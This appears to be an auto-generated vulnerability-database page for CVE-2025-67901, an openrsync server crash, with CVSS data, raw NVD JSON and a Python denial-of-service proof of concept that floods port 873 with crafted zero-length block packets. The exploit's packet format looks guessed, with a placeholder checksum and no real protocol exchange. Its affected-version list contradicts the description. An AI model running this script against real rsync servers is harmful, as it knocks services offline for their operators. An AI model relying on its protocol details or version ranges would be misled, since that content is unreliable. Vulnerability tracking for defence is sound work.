Security Vulnerability Report
中文
CVE-2025-67901 CVSS 5.3 MEDIUM

CVE-2025-67901

Published: 2025-12-15 00:15:40
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

openrsync through 0.5.0, as used in OpenBSD through 7.8 and on other platforms, allows a client to cause a server SIGSEGV by specifying a length of zero for block data, because the relationship between p->rem and p->len is not checked.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

openrsync < 0.5.0
OpenBSD < 7.8
其他使用openrsync 0.5.0及之前版本的平台

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import struct def exploit_openrsync_dos(target_ip, target_port=873): """ PoC for CVE-2025-67901: openrsync SIGSEGV via zero-length block data This exploits the lack of validation between p->rem and p->len in blocks.c """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, target_port)) # RSYNC protocol handshake rsync_protocol = b"@RSYNCD: 31.0\n" sock.send(rsync_protocol) response = sock.recv(1024) if b"RSYNCD: OK" not in response: print("[-] RSYNC handshake failed") return False # Send module list request sock.send(b"\n") response = sock.recv(1024) # Construct malicious block data with zero length # This triggers SIGSEGV in blocks.c due to unchecked p->rem vs p->len malicious_packet = bytearray() # Block data with zero length indicator # Format: block_index (4 bytes) + length (4 bytes set to 0) + checksum (16 bytes) block_index = struct.pack("<I", 0) # Block index zero_length = struct.pack("<I", 0) # Zero length - the key exploit vector checksum = b"\x00" * 16 # Placeholder checksum malicious_packet.extend(block_index) malicious_packet.extend(zero_length) malicious_packet.extend(checksum) # Send multiple zero-length block requests to increase reliability for _ in range(10): sock.send(malicious_packet) print("[+] Malicious packet sent, target may crash with SIGSEGV") sock.close() return True except Exception as e: print(f"[-] Error: {e}") return False # Usage example # exploit_openrsync_dos("192.168.1.100", 873)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67901", "sourceIdentifier": "[email protected]", "published": "2025-12-15T00:15:40.227", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "openrsync through 0.5.0, as used in OpenBSD through 7.8 and on other platforms, allows a client to cause a server SIGSEGV by specifying a length of zero for block data, because the relationship between p->rem and p->len is not checked."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "references": [{"url": "https://github.com/kristapsdz/openrsync/issues/34", "source": "[email protected]"}, {"url": "https://github.com/openbsd/src/blob/60b9c3dff1abf933e85e3c4d96b54201ee947513/usr.bin/rsync/blocks.c#L480-L481", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.